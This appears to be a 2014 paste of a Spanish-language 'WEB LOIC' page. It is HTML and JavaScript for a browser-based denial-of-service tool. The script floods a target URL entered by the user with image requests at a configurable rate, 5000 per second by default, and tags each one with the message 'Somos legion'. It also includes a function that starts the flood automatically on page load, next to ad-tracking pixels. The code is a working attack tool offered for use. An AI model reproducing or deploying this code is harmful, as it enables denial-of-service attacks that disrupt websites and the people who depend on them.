WEB LOIC


SUBMITTED BY: Guest

DATE: Feb. 1, 2014, 1:51 a.m.

FORMAT: Text only

SIZE: 11.8 kB

HITS: 691

  1. <body background=""><center>
  2. <h3></h3>
  3. <p>Anonymous<style type="text/css">
  4. <!--
  5. body {
  6. text-align:center;
  7. background-color: #000;
  8. font-family:Verdana, Geneva, sans-serif;
  9. color:#FFF;
  10. }
  11. .centrado { width: 1100px; margin-left:auto; margin-right:auto; margin-top:15px; height:650px;}
  12. .left {
  13. float:left;
  14. margin-left:10px;}
  15. .van { background-repeat:repeat-x; width:819px; text-align:left; float:left; margin-top:10px;}
  16. .vann {height: auto; width: 819px; text-align:left; margin-left:auto; margin-right:auto;}
  17. .button {
  18. width:118px;
  19. height:35px;
  20. display:block;
  21. font-family:Tahoma;
  22. font-size:20px;
  23. font-weight:bolder;
  24. color:#fff;
  25. float:left;
  26. text-align:center;
  27. text-decoration:none;
  28. padding-top:10px;
  29. margin-left:2px;
  30. }
  31. .Estilo1 {
  32. color: #000000;
  33. font-weight: bold;
  34. font-size: 18px;
  35. }
  36. .Estilo2 {color: #FF0000;}
  37. .Estilo3 {color: #002BFF;}
  38. .Estilo4 {color: #FFFC00;}
  39. .Estilo6 {color: #FFFFFF; font-weight: bold;}
  40. h1 {color:#FFF;}
  41. .vids { height: 765px; width: 640px; overflow: hidden; margin-left:auto; margin-right:auto; }
  42. .embeds { width: 640px; }
  43. -->
  44. </style>
  45. <div class="centrado">
  46. <div style="width:1100px; overflow:hidden; padding-top:4px; float:left">
  47. <div id="loic" style="z-index:10; width:1100px; margin-bottom:20px; height:770px;">
  48. <div style="margin-left:auto; margin-right:auto">
  49. <h1>WEB LOIC<br />
  50. Deje Esta Web Abierta Para Atacar<br /></h1>
  51. <p><div style="position: relative; width: 10030000px; height: 100%; left: -180px; top: px;">
  52. <div style="width: 490px; height: 331px; position: absolute; left: 186px; top: -15px;">
  53. <img alt="LOIC" src="http://i55.tinypic.com/2i7mxcj.png" width="979" height="482" /></div>
  54. <div style="width: 323px; height: 73px; position: absolute; left: 427px; top: -1px;">
  55. <fieldset style="width: 100%; height: 100%;">
  56. <legend>Step 1. Selecciona Target: </legend>
  57. <label>PON EL TARGET<br />
  58. <input name="xD" id="targetURL" style="width: 100%;" value="http://"/>
  59. </label>
  60. <legend></legend>
  61. </fieldset>
  62. </div>
  63. <div style="width: 240px; height: 100px; position: absolute; left: 876px; top: -8px;">
  64. <fieldset style="width: 100%; height: 100%;">
  65. <legend>Step 2. Listo?</legend>
  66. <button id="fireButton" style="background-color:#0015FF; border-color: rgb(255, 255, 255); color: rgb(255, 255, 255); width: 240px; height: 70px;"> Dejar de Disparar! </button>
  67. </fieldset>
  68. </div>
  69. <div style="width: 685px; height: 140px; position: absolute; left: 404px; top: 110px;">
  70. <fieldset style="width: 100%; height: 100%;">
  71. <legend>Opcional. Opciones De Attack? </legend>
  72. <label><span id="result_box"><span title="Requests per second">Solicitudes por segundo</span></span>: <input style="width: 40px;" id="rps" value="5000" /></label>
  73. <p>&nbsp;</p>
  74. <label>Mensaje:<br />
  75. <input id="message" style="width: 100%;" value="Somos legion" />
  76. </label>
  77. </fieldset>
  78. <div style="width: 676px; height: 163px; position: absolute; left: 0px; top: 167px;">
  79. <fieldset style="width: 100%; height: 100%;">
  80. <legend>Attack status:</legend>
  81. <dl>
  82. <dt>Solicitudes:</dt>
  83. <dd class="Estilo4" id="requestedCtr">0</dd>
  84. <dt>Logros:</dt>
  85. <dd class="Estilo4" id="succeededCtr">0</dd>
  86. <dt>Fallidos:</dt>
  87. <dd class="Estilo1" id="failedCtr">0</dd>
  88. </dl>
  89. </fieldset>
  90. </div>
  91. </div>
  92. </div>
  93. <script>
  94. (function () {
  95. var fireInterval;
  96. var isFiring = false;
  97. var currentTime = new Date()
  98. var lastSuccess = currentTime.getTime();
  99. var requestedCtrNode = document.getElementById("requestedCtr"),
  100. succeededCtrNode = document.getElementById("succeededCtr"),
  101. failedCtrNode = document.getElementById("failedCtr"),
  102. targetURLNode = document.getElementById("targetURL"),
  103. fireButton = document.getElementById("fireButton"),
  104. messageNode = document.getElementById("message"),
  105. rpsNode = document.getElementById("rps"),
  106. timeoutNode = document.getElementById("timeout");
  107. var targetURL = targetURLNode.value;
  108. targetURLNode.onchange = function () {
  109. targetURL = this.value;
  110. };
  111. var requestsHT = {}; // requests hash table, may come in handy later
  112. var requestedCtr = 0,
  113. succeededCtr = 0,
  114. failedCtr = 0;
  115. var makeHttpRequest = function () {
  116. if ( (currentTime.getTime()-lastSuccess) > 10000) { //Allow no more than 1000 hung requests
  117. return;
  118. } else { lastSuccess = currentTime.getTime();};
  119. var rID =Number(new Date());
  120. var img = new Image();
  121. img.onerror = function () { onFail(rID); };
  122. img.onabort = function () { onFail(rID); };
  123. img.onload = function () { onSuccess(rID); }; // TODO: it may never happen if target URL is not an image... // but probably can be fixed with different methods
  124. img.setAttribute("src", targetURL + "?id=" + rID + "&msg=" + messageNode.value);
  125. requestsHT[rID] = img;
  126. onRequest(rID);
  127. };
  128. var onRequest = function (rID) {
  129. requestedCtr++;
  130. requestedCtrNode.innerHTML = requestedCtr;
  131. };
  132. var onComplete = function (rID) {
  133. delete requestsHT[rID];
  134. };
  135. var onFail = function (rID) {
  136. // failedCtr++;
  137. //failedCtrNode.innerHTML = failedCtr;
  138. succeededCtr++; //Seems like the url will always fail it it isn't an image
  139. succeededCtrNode.innerHTML = succeededCtr;
  140. delete requestsHT[rID]; // we can't keep it forever or it would blow up the browser
  141. };
  142. var onSuccess = function (rID) {
  143. succeededCtr++;
  144. succeededCtrNode.innerHTML = succeededCtr;
  145. delete requestsHT[rID];
  146. };
  147. fireButton.onclick = function () {
  148. if (isFiring) {
  149. clearInterval(fireInterval);
  150. isFiring = false;
  151. this.innerHTML = "Disparar Otra Vez!";
  152. } else {
  153. isFiring = true;
  154. this.innerHTML = "Dejar de Disparar!";
  155. fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(rpsNode.value) | 0));
  156. }
  157. };
  158. function Firecolombianew() {
  159. if (isFiring) {
  160. clearInterval(fireInterval);
  161. isFiring = false;
  162. this.innerHTML = "Disparar Otra Vez!";
  163. } else {
  164. isFiring = true;
  165. this.innerHTML = "Stop flooding";
  166. fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(rpsNode.value) | 0));
  167. }
  168. };
  169. //Cambiar Target y descomentar la funcion Firecolombianew();
  170. document.getElementById("targetURL").value = "http://";
  171. Firecolombianew();
  172. })();
  173. </script>
  174. </p></div>
  175. </div>
  176. </div>
  177. </div>
  178. <script>var _wau = _wau || []; _wau.push(["tab", "lf1vnhkrsd0x", "38b", "left-middle"]);(function() { var s=document.createElement("script"); s.async=true; s.src="http://widgets.amung.us/tab.js";document.getElementsByTagName("head")[0].appendChild(s);})();</script>
  179. </!doctype></p>
  180. <center>
  181. <!-- begin adf.ly conversion tracking --><img src="http://adf.ly/conv.php?aid=56NA0" width="1" height="1" border="0" hspace="0" vspace="0" /><!-- end adf.ly conversion tracking -->
  182. <!-- begin adf.ly conversion tracking Anuncio Cristo ha Vuelto--><img src="http://adf.ly/conv.php?aid=5EHaQ" width="1" height="1" border="0" hspace="0" vspace="0" /><!-- end adf.ly conversion tracking -->
  183. <!-- begin adf.ly conversion tracking del anuncio Proxy Generico de Cristo Vive --><img src="http://adf.ly/conv.php?aid=52yjb" width="1" height="1" border="0" hspace="0" vspace="0" /><!-- end adf.ly conversion tracking -->
  184. <!-- begin adf.ly conversion tracking cristo vive Brasileiro--><img src="http://adf.ly/conv.php?aid=52xSL" width="1" height="1" border="0" hspace="0" vspace="0" /><!-- end adf.ly conversion tracking -->
  185. <!-- begin adf.ly conversion tracking cristo vive Ingles Mundial --><img src="http://adf.ly/conv.php?aid=56Nu7" width="1" height="1" border="0" hspace="0" vspace="0" /><!-- end adf.ly conversion tracking -->
  186. <!--- inicio codigo www.gratisparaweb.com ---><div align="center"><a href="http://contadores.gratisparaweb.com" target="_blank"><img src="http://www.gratisparaweb.com/contadores/imagen.php?contador=44&id2=81" alt="Contadores" border="0"></a><br><br><img src="http://www.gratisparaweb.com/imgs/barra-contadores.gif" alt="Contadores de visitas gratis para web" width="80" height="15" border="0" usemap="#Map" /><map name="Map"><area shape="rect" coords="48,1,90,22" href="http://www.cursosparati.com" target="_blank" alt="Cursos"><area shape="rect" coords="0,0,47,15" href="http://contadores.gratisparaweb.com" target="_blank" alt="Contadores de visitas gratis para web"></map></a></div><!--- fin codigo www.gratisparaweb.com --->
  187. <!-- Codigo contadorvisitas.com ver. 4.3 -->
  188. <script language="javascript" src="http://aux01.contadorgratis.com/hitv4.php?digit=fdg&page=19159e015a01e0fb9028b292dec4cef2"></script>
  189. <br><font size=1><a href="http://www.contadorvisitas.com" target="_blank">Contador de visitas</a></font>
  190. <!-- FIN Codigo contadorvisitas.com -->

comments powered by Disqus